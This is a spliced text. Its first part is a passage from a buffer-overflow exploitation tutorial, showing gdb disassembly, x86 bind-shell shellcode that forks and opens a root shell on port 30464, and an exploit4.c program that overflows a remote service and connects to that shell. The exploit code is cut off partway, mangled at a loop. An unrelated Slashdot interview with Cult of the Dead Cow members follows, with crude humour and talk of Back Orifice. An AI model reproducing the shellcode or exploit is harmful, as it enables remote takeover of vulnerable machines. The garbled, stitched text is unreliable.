0x804cd80 :     movl   %ebx,%edx
0x804cd82 :     movl   $0x66,%eax
0x804cd87 :     movl   $0x4,%ebx
0x804cd8c :     leal   0x4(%esp,1),%ecx
0x804cd90 :     int    $0x80
0x804cd92 :     movl   %edx,%ebx
0x804cd94 :     cmpl   $0xffffff83,%eax
0x804cd97 :     jae    0x804cdc0 <__syscall_error>
0x804cd9d :     ret
0x804cd9e :     nop
0x804cd9f :     nop
End of assembler dump.
(gdb) disassemble accept
Dump of assembler code for function __accept:
0x804cd40 <__accept>:   movl   %ebx,%edx
0x804cd42 <__accept+2>: movl   $0x66,%eax
0x804cd47 <__accept+7>: movl   $0x5,%ebx
0x804cd4c <__accept+12>:        leal   0x4(%esp,1),%ecx
0x804cd50 <__accept+16>:        int    $0x80
0x804cd52 <__accept+18>:        movl   %edx,%ebx
0x804cd54 <__accept+20>:        cmpl   $0xffffff83,%eax
0x804cd57 <__accept+23>:        jae    0x804cdc0 <__syscall_error>
0x804cd5d <__accept+29>:        ret
0x804cd5e <__accept+30>:        nop
0x804cd5f <__accept+31>:        nop
End of assembler dump.
(gdb) disassemble dup2
Dump of assembler code for function dup2:
0x804cbe0 :     movl   %ebx,%edx
0x804cbe2 :     movl   0x8(%esp,1),%ecx
0x804cbe6 :     movl   0x4(%esp,1),%ebx
0x804cbea :     movl   $0x3f,%eax
0x804cbef :     int    $0x80
0x804cbf1 :     movl   %edx,%ebx
0x804cbf3 :     cmpl   $0xfffff001,%eax
0x804cbf8 :     jae    0x804cdc0 <__syscall_error>
0x804cbfe :     ret
0x804cbff :     nop
End of assembler dump.
(gdb)
----------------------------------------------------------------------------

fork(); code
----------------------------------------------------------------------------
char code[]=
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\xb0\x02"                  /* movb $0x2,%al */
  "\xcd\x80";                 /* int $0x80 */
----------------------------------------------------------------------------

socket(2,1,6); code
----------------------------------------------------------------------------
/* %ecx is a pointer of all arguments. */
char code[]=
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\x31\xdb"                  /* xorl %ebx,%ebx */
  "\x89\xf1"                  /* movl %esi,%ecx */
  "\xb0\x02"                  /* movb $0x2,%al */
  "\x89\x06"                  /* movl %eax,(%esi) */
                              /* The first argument. */
                              /* %esi has reference free memory space before using */
                              /* this instruction. */
  "\xb0\x01"                  /* movb $0x1,%al */
  "\x89\x46\x04"              /* movl %eax,0x4(%esi) */
                              /* The second argument. */
  "\xb0\x06"                  /* movb $0x6,%al */
  "\x89\x46\x08"              /* movl %eax,0x8(%esi) */
                              /* The third argument.
                              */
  "\xb0\x66"                  /* movb $0x66,%al */
  "\xb3\x01"                  /* movb $0x1,%bl */
  "\xcd\x80";                 /* int $0x80 */
----------------------------------------------------------------------------

bind(soc,(struct sockaddr *)&serv_addr,0x10); code
----------------------------------------------------------------------------
/* %ecx is a pointer of all arguments. */
char code[]=
  "\x89\xf1"                  /* movl %esi,%ecx */
  "\x89\x06"                  /* movl %eax,(%esi) */
                              /* %eax has to have soc value before using this */
                              /* instruction. */
                              /* the first argument. */
  "\xb0\x02"                  /* movb $0x2,%al */
  "\x66\x89\x46\x0c"          /* movw %ax,0xc(%esi) */
                              /* serv_addr.sin_family=2 */
                              /* 2 is stored at 0xc(%esi). */
  "\xb0\x77"                  /* movb $0x77,%al */
  "\x66\x89\x46\x0e"          /* movw %ax,0xe(%esi) */
                              /* store port number at 0xe(%esi) */
  "\x8d\x46\x0c"              /* leal 0xc(%esi),%eax */
                              /* %eax = the address of serv_addr */
  "\x89\x46\x04"              /* movl %eax,0x4(%esi) */
                              /* the second argument. */
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\x89\x46\x10"              /* movl %eax,0x10(%esi) */
                              /* serv_addr.sin_addr.s_addr=0 */
                              /* 0 is stored at 0x10(%esi). */
  "\xb0\x10"                  /* movb $0x10,%al */
  "\x89\x46\x08"              /* movl %eax,0x8(%esi) */
                              /* the third argument. */
  "\xb0\x66"                  /* movb $0x66,%al */
  "\xb3\x02"                  /* movb $0x2,%bl */
  "\xcd\x80";                 /* int $0x80 */
----------------------------------------------------------------------------

listen(soc,1); code
----------------------------------------------------------------------------
/* %ecx is a pointer of all arguments. */
char code[]=
  "\x89\xf1"                  /* movl %esi,%ecx */
  "\x89\x06"                  /* movl %eax,(%esi) */
                              /* %eax has to have soc value before using this */
                              /* instruction. */
                              /* the first argument. */
  "\xb0\x01"                  /* movb $0x1,%al */
  "\x89\x46\x04"              /* movl %eax,0x4(%esi) */
                              /* the second argument.
                              */
  "\xb0\x66"                  /* movb $0x66,%al */
  "\xb3\x04"                  /* movb $0x4,%bl */
  "\xcd\x80";                 /* int $0x80 */
----------------------------------------------------------------------------

accept(soc,0,0); code
----------------------------------------------------------------------------
/* %ecx is a pointer of all arguments. */
char code[]=
  "\x89\xf1"                  /* movl %esi,%ecx */
  "\x89\x06"                  /* movl %eax,(%esi) */
                              /* %eax has to have soc value before using this */
                              /* instruction. */
                              /* the first argument. */
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\x89\x46\x04"              /* movl %eax,0x4(%esi) */
                              /* the second argument. */
  "\x89\x46\x08"              /* movl %eax,0x8(%esi) */
                              /* the third argument. */
  "\xb0\x66"                  /* movb $0x66,%al */
  "\xb3\x05"                  /* movb $0x5,%bl */
  "\xcd\x80";                 /* int $0x80 */
----------------------------------------------------------------------------

dup2(cli,0); code
----------------------------------------------------------------------------
/* the first argument is %ebx and the second argument */
/* is %ecx */
char code[]=
                              /* %eax has to have cli value before using this */
                              /* instruction. */
  "\x88\xc3"                  /* movb %al,%bl */
  "\xb0\x3f"                  /* movb $0x3f,%al */
  "\x31\xc9"                  /* xorl %ecx,%ecx */
  "\xcd\x80";                 /* int $0x80 */
----------------------------------------------------------------------------

6.3 Modify the normal shellcode

Merging the pieces above takes some work.

new shellcode
----------------------------------------------------------------------------
char shellcode[]=
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\xb0\x02"                  /* movb $0x2,%al */
  "\xcd\x80"                  /* int $0x80 */
  "\x85\xc0"                  /* testl %eax,%eax */
  "\x75\x43"                  /* jne 0x43 */
                              /* fork()!=0 case */
                              /* It will call exit(0) */
                              /* To do that, it will jump twice, because exit(0) is */
                              /* located so far. */
  "\xeb\x43"                  /* jmp 0x43 */
                              /* fork()==0 case */
                              /* It will call -0xa5 */
                              /* To do that, it will jump twice, because call -0xa5 */
                              /* is located so far.
                              */
  "\x5e"                      /* popl %esi */
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\x31\xdb"                  /* xorl %ebx,%ebx */
  "\x89\xf1"                  /* movl %esi,%ecx */
  "\xb0\x02"                  /* movb $0x2,%al */
  "\x89\x06"                  /* movl %eax,(%esi) */
  "\xb0\x01"                  /* movb $0x1,%al */
  "\x89\x46\x04"              /* movl %eax,0x4(%esi) */
  "\xb0\x06"                  /* movb $0x6,%al */
  "\x89\x46\x08"              /* movl %eax,0x8(%esi) */
  "\xb0\x66"                  /* movb $0x66,%al */
  "\xb3\x01"                  /* movb $0x1,%bl */
  "\xcd\x80"                  /* int $0x80 */
  "\x89\x06"                  /* movl %eax,(%esi) */
  "\xb0\x02"                  /* movb $0x2,%al */
  "\x66\x89\x46\x0c"          /* movw %ax,0xc(%esi) */
  "\xb0\x77"                  /* movb $0x77,%al */
  "\x66\x89\x46\x0e"          /* movw %ax,0xe(%esi) */
  "\x8d\x46\x0c"              /* leal 0xc(%esi),%eax */
  "\x89\x46\x04"              /* movl %eax,0x4(%esi) */
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\x89\x46\x10"              /* movl %eax,0x10(%esi) */
  "\xb0\x10"                  /* movb $0x10,%al */
  "\x89\x46\x08"              /* movl %eax,0x8(%esi) */
  "\xb0\x66"                  /* movb $0x66,%al */
  "\xb3\x02"                  /* movb $0x2,%bl */
  "\xcd\x80"                  /* int $0x80 */
  "\xeb\x04"                  /* jmp 0x4 */
  "\xeb\x55"                  /* jmp 0x55 */
  "\xeb\x5b"                  /* jmp 0x5b */
  "\xb0\x01"                  /* movb $0x1,%al */
  "\x89\x46\x04"              /* movl %eax,0x4(%esi) */
  "\xb0\x66"                  /* movb $0x66,%al */
  "\xb3\x04"                  /* movb $0x4,%bl */
  "\xcd\x80"                  /* int $0x80 */
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\x89\x46\x04"              /* movl %eax,0x4(%esi) */
  "\x89\x46\x08"              /* movl %eax,0x8(%esi) */
  "\xb0\x66"                  /* movb $0x66,%al */
  "\xb3\x05"                  /* movb $0x5,%bl */
  "\xcd\x80"                  /* int $0x80 */
  "\x88\xc3"                  /* movb %al,%bl */
  "\xb0\x3f"                  /* movb $0x3f,%al */
  "\x31\xc9"                  /* xorl %ecx,%ecx */
  "\xcd\x80"                  /* int $0x80 */
  "\xb0\x3f"                  /* movb $0x3f,%al */
  "\xb1\x01"                  /* movb $0x1,%cl */
  "\xcd\x80"                  /* int $0x80 */
  "\xb0\x3f"                  /* movb $0x3f,%al */
  "\xb1\x02"                  /* movb $0x2,%cl */
  "\xcd\x80"                  /* int $0x80 */
  "\xb8\x2f\x62\x69\x6e"      /* movl $0x6e69622f,%eax */
                              /* %eax="/bin" */
  "\x89\x06"                  /* movl %eax,(%esi) */
  "\xb8\x2f\x73\x68\x2f"      /* movl $0x2f68732f,%eax */
                              /* %eax="/sh/" */
  "\x89\x46\x04"              /* movl %eax,0x4(%esi) */
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\x88\x46\x07"              /* movb %al,0x7(%esi) */
  "\x89\x76\x08"              /* movl %esi,0x8(%esi) */
  "\x89\x46\x0c"              /* movl %eax,0xc(%esi) */
  "\xb0\x0b"                  /* movb $0xb,%al */
  "\x89\xf3"                  /* movl %esi,%ebx */
  "\x8d\x4e\x08"              /* leal 0x8(%esi),%ecx */
  "\x8d\x56\x0c"              /* leal 0xc(%esi),%edx */
  "\xcd\x80"                  /* int $0x80 */
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\xb0\x01"                  /* movb $0x1,%al */
  "\x31\xdb"                  /* xorl %ebx,%ebx */
  "\xcd\x80"                  /* int $0x80 */
  "\xe8\x5b\xff\xff\xff";     /* call -0xa5 */
----------------------------------------------------------------------------

6.4 Exploit vulnerable4 program

With this shellcode you can write the exploit easily. You also have to write
the code that connects to the socket.

exploit4.c
----------------------------------------------------------------------------
#include
#include
#include
#include
#include

#define ALIGN                   0
#define OFFSET                  0
#define RET_POSITION            1024
#define RANGE                   20
#define NOP                     0x90

char shellcode[]=
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\xb0\x02"                  /* movb $0x2,%al */
  "\xcd\x80"                  /* int $0x80 */
  "\x85\xc0"                  /* testl %eax,%eax */
  "\x75\x43"                  /* jne 0x43 */
  "\xeb\x43"                  /* jmp 0x43 */
  "\x5e"                      /* popl %esi */
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\x31\xdb"                  /* xorl %ebx,%ebx */
  "\x89\xf1"                  /* movl %esi,%ecx */
  "\xb0\x02"                  /* movb $0x2,%al */
  "\x89\x06"                  /* movl %eax,(%esi) */
  "\xb0\x01"                  /* movb $0x1,%al */
  "\x89\x46\x04"              /* movl %eax,0x4(%esi) */
  "\xb0\x06"                  /* movb $0x6,%al */
  "\x89\x46\x08"              /* movl %eax,0x8(%esi) */
  "\xb0\x66"                  /* movb $0x66,%al */
  "\xb3\x01"                  /* movb $0x1,%bl */
  "\xcd\x80"                  /* int $0x80 */
  "\x89\x06"                  /* movl %eax,(%esi) */
  "\xb0\x02"                  /* movb $0x2,%al */
  "\x66\x89\x46\x0c"          /* movw %ax,0xc(%esi) */
  "\xb0\x77"                  /* movb $0x77,%al */
  "\x66\x89\x46\x0e"          /* movw %ax,0xe(%esi) */
  "\x8d\x46\x0c"              /* leal 0xc(%esi),%eax */
  "\x89\x46\x04"              /* movl %eax,0x4(%esi) */
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\x89\x46\x10"              /* movl %eax,0x10(%esi) */
  "\xb0\x10"                  /* movb $0x10,%al */
  "\x89\x46\x08"              /* movl %eax,0x8(%esi) */
  "\xb0\x66"                  /* movb $0x66,%al */
  "\xb3\x02"                  /* movb $0x2,%bl */
  "\xcd\x80"                  /* int $0x80 */
  "\xeb\x04"                  /* jmp 0x4 */
  "\xeb\x55"                  /* jmp 0x55 */
  "\xeb\x5b"                  /* jmp 0x5b */
  "\xb0\x01"                  /* movb $0x1,%al */
  "\x89\x46\x04"              /* movl %eax,0x4(%esi) */
  "\xb0\x66"                  /* movb $0x66,%al */
  "\xb3\x04"                  /* movb $0x4,%bl */
  "\xcd\x80"                  /* int $0x80 */
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\x89\x46\x04"              /* movl %eax,0x4(%esi) */
  "\x89\x46\x08"              /* movl %eax,0x8(%esi) */
  "\xb0\x66"                  /* movb $0x66,%al */
  "\xb3\x05"                  /* movb $0x5,%bl */
  "\xcd\x80"                  /* int $0x80 */
  "\x88\xc3"                  /* movb %al,%bl */
  "\xb0\x3f"                  /* movb $0x3f,%al */
  "\x31\xc9"                  /* xorl %ecx,%ecx */
  "\xcd\x80"                  /* int $0x80 */
  "\xb0\x3f"                  /* movb $0x3f,%al */
  "\xb1\x01"                  /* movb $0x1,%cl */
  "\xcd\x80"                  /* int $0x80 */
  "\xb0\x3f"                  /* movb $0x3f,%al */
  "\xb1\x02"                  /* movb $0x2,%cl */
  "\xcd\x80"                  /* int $0x80 */
  "\xb8\x2f\x62\x69\x6e"      /* movl $0x6e69622f,%eax */
  "\x89\x06"                  /* movl %eax,(%esi) */
  "\xb8\x2f\x73\x68\x2f"      /* movl $0x2f68732f,%eax */
  "\x89\x46\x04"              /* movl %eax,0x4(%esi) */
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\x88\x46\x07"              /* movb %al,0x7(%esi) */
  "\x89\x76\x08"              /* movl %esi,0x8(%esi) */
  "\x89\x46\x0c"              /* movl %eax,0xc(%esi) */
  "\xb0\x0b"                  /* movb $0xb,%al */
  "\x89\xf3"                  /* movl %esi,%ebx */
  "\x8d\x4e\x08"              /* leal 0x8(%esi),%ecx */
  "\x8d\x56\x0c"              /* leal 0xc(%esi),%edx */
  "\xcd\x80"                  /* int $0x80 */
  "\x31\xc0"                  /* xorl %eax,%eax */
  "\xb0\x01"                  /* movb $0x1,%al */
  "\x31\xdb"                  /* xorl %ebx,%ebx */
  "\xcd\x80"                  /* int $0x80 */
  "\xe8\x5b\xff\xff\xff";     /* call -0xa5 */

unsigned long get_sp(void)
{
  __asm__("movl %esp,%eax");
}

long getip(char *name)
{
  struct hostent *hp;
  long ip;

  if((ip=inet_addr(name))==-1)
  {
    if((hp=gethostbyname(name))==NULL)
    {
      fprintf(stderr,"Can't resolve host.\n");
      exit(0);
    }
    memcpy(&ip,(hp->h_addr),4);
  }
  return ip;
}

int exec_sh(int sockfd)
{
  char snd[4096],rcv[4096];
  fd_set rset;

  while(1)
  {
    FD_ZERO(&rset);
    FD_SET(fileno(stdin),&rset);
    FD_SET(sockfd,&rset);
    select(255,&rset,NULL,NULL,NULL);
    if(FD_ISSET(fileno(stdin),&rset))
    {
      memset(snd,0,sizeof(snd));
      fgets(snd,sizeof(snd),stdin);
      write(sockfd,snd,strlen(snd));
    }
    if(FD_ISSET(sockfd,&rset))
    {
      memset(rcv,0,sizeof(rcv));
      if(read(sockfd,rcv,sizeof(rcv))<=0)
        exit(0);
      fputs(rcv,stdout);
    }
  }
}

int connect_sh(long ip)
{
  int sockfd,i;
  struct sockaddr_in sin;

  printf("Connect to the shell\n");
  fflush(stdout);
  memset(&sin,0,sizeof(sin));
  sin.sin_family=AF_INET;
  sin.sin_port=htons(30464);
  sin.sin_addr.s_addr=ip;
  if((sockfd=socket(AF_INET,SOCK_STREAM,0))<0)
  {
    printf("Can't create socket\n");
    exit(0);
  }
  if(connect(sockfd,(struct sockaddr *)&sin,sizeof(sin))<0)
  {
    printf("Can't connect to the shell\n");
    exit(0);
  }
  return sockfd;
}

void main(int argc,char **argv)
{
  char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
  long addr;
  unsigned long sp;
  int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
  int i;
  int sockfd;

  if(argc>1)
    offset=atoi(argv[1]);

  sp=get_sp();
  addr=sp-offset;

  for(i=0;i>8;
    buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
    buff[i+ALIGN+3]=(addr&0xff000000)>>24;
  }

  for(i=0;i

If it's from MS, the security is crap. Everything else is better by
comparison. Linux is pretty good if you're a Linux guru. Same thing with any
other flavor of UNIX. But no matter how good you are, there's someone out
there who is better than you. "The price of secure connectivity is eternal
vigilance!"

--

DilDog answers:

Windows95 / 98 - Shit happens
Commercial Unix - Shit happens over RPC.
Linux - When shit happens, you fix it.
FreeBSD - Shit would happen, but there's no driver for it yet.
NT - Shit wouldn't happen if you'd just spend a few months performing 300+
modifications to our default installation, you lazy sysadmin. Get your MCSE.
Windows 2000 (NT5) - Shit happens over DCOM.

--

Tweety Fish answers:

Except for Windows95/98, which I would characterize as sucking ass across the
board, there's no simple answer to that question. All of those operating
systems are (reasonably) securable, in theory, but if you want to make the job
of securing a box easier, why not run OpenBSD?
xmedar asks:

There is an episode of South Park with cows worshipping a cow clock, and when
it is removed by the people, the cows all jump off a cliff. Now I've heard
that referred to as the Cult of the Dead Cow episode. Is it anything to do
with cDc, or are cults for dead cows just in fashion right now?

cDc answers:

Obscure Images answers:

We would like to believe that we were inspirational to the creators of South
Park, but we will defer to the obviously natural call of bovinity.

--

Reid Fleming answers:

Our lawyers will not permit us to comment upon the episode in question.

--

G. Ratte' answers:

Sure. I hear the next round of Calvin Klein ads will feature Kate Moss
munching a big greasy cheeseburger as Kari Wuhrer cleaves an axe through a
cow's head. And a roomful of Italian boys with no chest hair look on in quiet
desperation. It's a scene straight from one of our industry convention
parties.

--

Nighstalker answers:

The universe is a chaotic system. If Ratte had been screwing around in a
sewage treatment plant, rather than an abandoned slaughterhouse, we could
have been called the Cult of Recycled Shit. That the guys from South Park had
a cult of suicidal cows may be our fault. Maybe not.

--

Tequila Willy answers:

I know this episode well, and I've spent a lot of time studying the various
interpretations of this episode. Though the Cult of the Dead Cow
interpretation is a very plausible and popular connection to make, there is
another very plausible interpretation that I think you will find
interesting. The hands on the clock are metaphors for the phallus. The
removal of the clock represents castration. The removal of the phallus limits
sexual options and limited options are bad. The cows demonstrate their
adherence to their principle of "maximum freedom or death" by jumping off the
cliff. You might ask yourself, xmedar, whether you have any principles that
you would be willing to die for.
--

Tweety Fish answers:

TV writers (comedy writers especially) tend to be unrepentant fanboys with
computers and tight deadlines... you decide.

Effugas asks:

To the various illustrious (translation: I've worshipped you guys for the
majority of my life) members of the Cult of the Dead Cow: Moo. That being
said, I'd like to know what have been the most surprising events in the
computer industry for you. Anything's fair game. What just came out of
nowhere and knocked the Cult flat on its ass?

cDc answers:

Obscure Images answers:

We haven't been knocked on our asses yet by anything that has happened in the
computer industry. We're great at believing that whatever we see is directly
caused by our underground efforts. We would be knocked on our ass if we
didn't believe that. Oh yeah, Linus Torvalds is a cDc simulacra unit.

--

Reid Fleming answers:

www.realdoll.com
www.jerkcity.com

--

GA Ellsworth answers:

http://www2.promisekeepers.org/

--

G. Ratte' answers:

I'm mostly surprised by what hasn't happened. I thought floppy disks would
get bigger and bigger 'til they became a 3-foot square, and you'd use 'em for
kites when they went bad. I thought for sure bubble memory was going to take
off, and pen-based OSes would rule the industry, and I'd have an Amiga
clipboard computer running MS's BOB right now. It should have been Atari, not
Microsoft.

--

Nighstalker answers:

Cheap powerful computers. Looking at the list prices of all my Commodore 128
gear shows me that the whole system cost more than a new iMac. Also, PDAs are
pretty surprising, how they just suddenly seem to be everywhere.

--

White Knight answers:

What surprised me most about the computer industry is how much less
attractive Kiki Stockhammer is in person.

--

Tweety Fish answers:

You know they got these things now that can take a picture and put it on the
screen thingy? That's so cool!
sinatra asks:

A recent article (forgot the reference) characterized codc members as a bunch
of social juveniles bound by no particular ideals, and lacking in both trust
and personal respect for other members as well as the (cr|h)acker communities
at-large. The evidence presented in the article however was limited to
on-stage behavior and a virus of unknown-but-suspicious origin on a
distributed CD. The codc archives paint an equally murky picture, depending
on the reader's perspective. So is there a codc code of ethics? Could such a
thing ever be enforced?

cDc answers:

Obscure Images answers:

I can't answer for everyone, but I will say that I am a moral relativist. I
think that the morality of an act is dependent on the context of that
action. As for cDc as a group, we are a very close knit group, very nearly a
family, and to think that there would be someone amongst us who would turn on
us is an absurdity. The article in question was written by a well known fool
who would fit in better at a meeting of the John Birch Society than a
computer convention.

--

Reid Fleming answers:

No and no.

--

G. Ratte' answers:

Lacking in trust and personal respect? I wish I knew the article you're
referring to, 'cause those are some pretty strange assumptions. But that's
funny, that's interesting. We're the kids the newspapers used to write about
being diagnosed with "Pac-Man elbow." We're the kids with the sore thumbs
from Atari joysticks playing "Combat" through our adolescence. We're the
first generation to grow up hearing a modem squeal every day after school. So
if there's any lack of trust and respect for the (cr/h)acker community, it's
self-loathing and it's all in the family. Familiarity breeds contempt. The
only ethic is to not be, uh, k-lame. Spreading viruses is not good.

--

Nighstalker answers:

I read that article. The author is an ignorant twat. For what it's worth, I
trust my very life with any cDc member. I trust them implicitly.
I suspect that cDc individually and as a group is far more ethical than
Microsoft. Anyone emails me, they get an answer directly from me, not some
flack from marketing.

--

Tequila Willy answers:

Dear Sinatra,

Who's codc? I've never heard of them.

--

Tweety Fish answers:

The nice thing about cDc is we're all cool enough, and all moral enough, that
there really is no need for us to enforce much of anything. Personally, I'm
constantly entertained by everything every other cDc member ever does, and
I'd much rather have that than the 1700 page cDc Moral Guide. Incidentally,
the author of that article also thinks that Richard Stallman should be
arrested and charged with monopolistic practices, so, you know, you shouldn't
believe everything you read.

[bog-oh] asks:

You folks have been around for so long, surely you've seen the evolution of
both terms. Are you quick to take a stand on misuse of either, or do you just
take it all in stride? Some of the older security folks out there are damned
sure that "hacking" is still purely malicious, and "cracking" simply means
breaking software registrations and the like. What do you feel each term
represents these days?

cDc answers:

Obscure Images answers:

We would like to take a stand on this nonsense once and for all. We are of
the firm opinion that the qualification for being a hacker is not something
that can be stated on clear moral grounds. As far as we are concerned,
crackers are something you eat.

--

Reid Fleming answers:

The term "cracker" is divisive, insulting, and should be considered
inappropriate in mixed company. Same for "honky" and "caucasian". "Hacker" on
the other hand, is perfectly fine for most social situations. As in: "Hey,
you! Hacker! Suck my dick!"

--

G. Ratte' answers:

Personally, I never use the term "hacking"... it's all just messing around to
me, and some of it could get you into trouble. Whatever. "Cracking" means
removing software protection, and a "cracker" is a white boy.
I don't know when people started fussing over the terms and using "cracking"
to mean system intrusions, but I think it all carries the stench of
journalist-invented nonsense. Same with all that "white/black hat" crap.
Nobody in this situation uses those terms, and they readily identify the user
as an outsider.

--

Tequila Willy answers:

Dear Bog-Oh,

Your sensitivity is to be applauded in these times largely characterized by
egocentric thinking. I appreciate that you've taken the time to ask me what I
*feel* about these terms. I feel good about what each term represents. Thank
you for asking.

--

Tweety Fish answers:

A cracker is somebody who cracks warez, and/or a pejorative term for a white
person. Any other meaning is never going to catch on in the media, nor with
the old school. It's just too complicated to remember the distinction all the
time. The people who are hackers by anybody's definition have done some...
uh... mischievous things in their time; it's part of the nature of the
beast. To say that "a real hacker would never break into a computer system"
indicates - to me - a lack of understanding of the original meaning of the
word. Of course a real hacker would break into a computer system, if it was
an interesting enough problem and they didn't anticipate anybody having a
problem with it. I agree that the media should widen its definition of what a
hacker is, but that's not the argument I usually see, especially here on
slashdot. I see a lot more of "they aren't a real hacker, because they break
into systems and/or do security stuff", which is plain silly. Personally, I
refer to people by whatever term they would like me to use, unless I don't
like them. Besides which, if you are doing something unexpected, unforeseen,
or disallowed to any system (which is my pocket definition of hacking)
somebody is always going to think it's bad, until you laboriously convince
them otherwise, on a case by case basis.
Why get caught up in semantic arguments when you could be doing cool things
and get noticed for THAT, instead?

phray01 asks:

please be honest
(1)boxers
(2)briefs
(3)panties
(4)thongs
(5)nothing
(6)orange
(7)Hemos the Hamster

cDc answers:

Obscure Images answers:

All of the above, though not necessarily at the same time.

--

Reid Fleming answers:

sacred vestments

--

GA Ellsworth answers:

Boxers for me..

--

G. Ratte' answers:

I refuse to answer this question, as I don't want to encourage your gross
masturbatory fantasies. What I choose to cover my massive, pulsating tool
swinging handily between my taut legs is my business, and my business only.
What should the touch of soft fabric brushing the tender head of my otherwise
steely rod matter to the likes of you? Disgusting!

--

Nighstalker answers:

Sheer to the waist black seamed pantyhose for formal affairs.

--

DilDog answers:

All of the above.

--

Tequila Willy answers:

Dear phray01,

The etiquette in this case actually depends upon whether you were east or
west of the Mississippi when this unfortunate accident occurred. East of the
Mississippi, the gas station attendant should remove the dog's head from your
windshield wipers when cleaning the windshield. However, please be prepared
to tip for this service. West of the Mississippi, it is usually considered
bad manners to expect gas station attendants to remove any animal bits that
have been wedged in your car parts. Thank you for asking.

--

Tweety Fish answers:

I actually try not to wear any slashdot operators that close to my skin.
Makes my pants look funny.

Foogle asks:

Let's face it - most people regard the cdc as a bunch of script-kiddies
looking for some limelight. The BackOrifice software really made this worse,
because it was seen, not as an admin tool, but as an application meant to
propagate cracking. How does this make you feel?
That is, what are your personal thoughts on the cult's activities and how do
you think they should be viewed from the professional side of the industry?

cDc answers:

Obscure Images answers:

cDc is not a group of script kiddies. We are united in our interest to hack
the world, be it through computers, words, images, sounds, politics, money,
or sex. Those who consider us to be script kiddies ought to shut the fuck up
and write their own tools. Using tools doesn't make someone a script kiddie;
what makes a script kiddie is the use of other people's tools to accomplish
things they have no interest in understanding. It is understandable for
professionals to be concerned with our reputations, but that is why we've
been completely open with our tools. We have software that can be used as
very effective tools.

--

Reid Fleming answers:

Most professionals get it. The trojan horse problem was considered to be low
priority a year ago. Things have changed as a direct result of Back Orifice
and Netbus. (By the way, you ever notice that sometimes journalists turn to
Russ Cooper for an "independent" perspective on Microsoft? And you ever
notice how often he agrees with the Microsoft position?)

--

G. Ratte' answers:

It's somewhat frustrating when something a lot of effort has gone into is
totally misunderstood by so many people. A lot of people seem to have an
aversion to the big picture and how BO fits into a larger whole. As for 'the
industry,' . Rah rah venture capital, rah rah IPO. "We've got this great new
site, Hats4Cats.com, a brave new world of headgear for our feline friends!
We're seeking the perfect partners to get this off the ground right, and if
you'll just look over this media kit at your leisure after the convention,
we'll have someone call you in the next few days about some great
opportunities!" That's 'the industry.' 'The industry' can kiss our
collective cDc ass.
--
Nighstalker answers: Most people couldn't plug in new RAM to their machines or install an application with the aid of an installation wizard. More so for the people that write about the digital underground who are not a part of the digital underground. BO was released to show up the miserable security of Windows, in the hope that MS would do something other than issue press releases and that users would be made aware of the pitiful security on their machines, particularly when connected to the Internet. BO2K was released in response to the pleas of countless IT professionals who needed a powerful admin tool.
--
DilDog answers: I don't feel one way or the other about it. I write code to fill a void whenever I find I need something that doesn't exist. Hence, BO2K. What Linux is to Commercial Unix, BO2K is to Commercial remote admin tools. I mean, what kind of sick and twisted hax0r would want to use FREE and POWERFUL software without having to pay out of their ass for it.
--
Tequila Willy answers: Dear Foogle, Thank you for being concerned about my feelings. However, I disagree with the metaphysical assumptions of your first question. I believe I choose how I feel and that the reaction of "most people" cannot make me feel any particular way. That being said, your second question seems more appropriate. The Cult of the Dead Cow should be viewed as what they are, namely, experts in global domination.
--
Tweety Fish answers: So the technical definition of Script Kiddie is one who uses pre-made scripts or tools to hack sites, instead of developing their own tools.. by that definition, how could we possibly be script kiddies? In the larger sense of BO2K being an application meant to propagate cracking, yes, that might happen, but the way we're doing it does serious work to raise awareness of these issues.
I think we're perfectly aware that this can be hard to understand, and we're perfectly willing to keep hammering our message home until people start to get it, and start working to fix these problems.

An_onymous Coward asks:

First of all I've got to say I think cdc is pretty damn cool. I was digging their .txts since I got my first dialup shell account long ago. Now, with you guys being so security minded and all, there's only one question I could think of for you: If you were to build your ideal network, with telnet, ssh, www, ftp, pop3, smtp, file & printer sharing, bind, etc... what would be your ideal configuration to maximize security? Please be specific about Network OSs, routers, network policies, protocols, filesystems, permissions, daemons, firewall rules, and anything else that comes to mind.

cDc answers:

Reid Fleming answers: Dedicated fiber lines in a star configuration. Ultra low transmissions, only a few quanta, to foil optical taps. One-time pad encryption for each packet. All plaintext messages composed in an alien language unknown to anyone but the participants. The actual content of the messages being hidden in subliminal channels too sensitive to be mentioned here.
--
DilDog answers: For cryin' out loud. My ideal network doesn't have half of that crap running. It can all be done with DCOM and HTTP. Just kidding! I -know- this is a Linux crowd, but I'm tellin' ya, take a look at OpenBSD for PROACTIVE security when it comes to that mission critical firewall box, network monitor, webserver, etc.
--
Tequila Willy answers: Dear Anonymous Coward, First, thank you for your compliments. However I am left wondering how many of our text files you have actually read. All of your questions have already been addressed in detail in our text file, Wet Mount Slide.
--
Tweety Fish answers: DUD3 Y3R TRY1N T0 B3 4LL SN34KY 4N' S0C1AL 3N1N33R US AN' SH1T A1N'T Y000?
B3TT3R US3 NM4P INST3D!@$#!@% If you want a genuine answer to that question, I'm sure the l0pht would be able to answer it as specifically as you need for a small fee.

Freshman asks:

Since BO is/was a big deal, I'm wondering what kind of companies have tried to contact you and what they had to say. Did Microsoft ever give you guys a buzz? The DoD maybe? CIA? If so, what did they have to say?

cDc answers:

Tweety Fish answers: We've been in constant communication with the CIA, NSA, and MOSSAD to make sure that the government-specific backdoors built into BO2K meet their tough standards for EoE (Ease of Eavesdropping).. we value the contributions the US and other governments have made to these products, and look forward to working much much more with them in the future. Microsoft hates us, I think.

rikek asks:

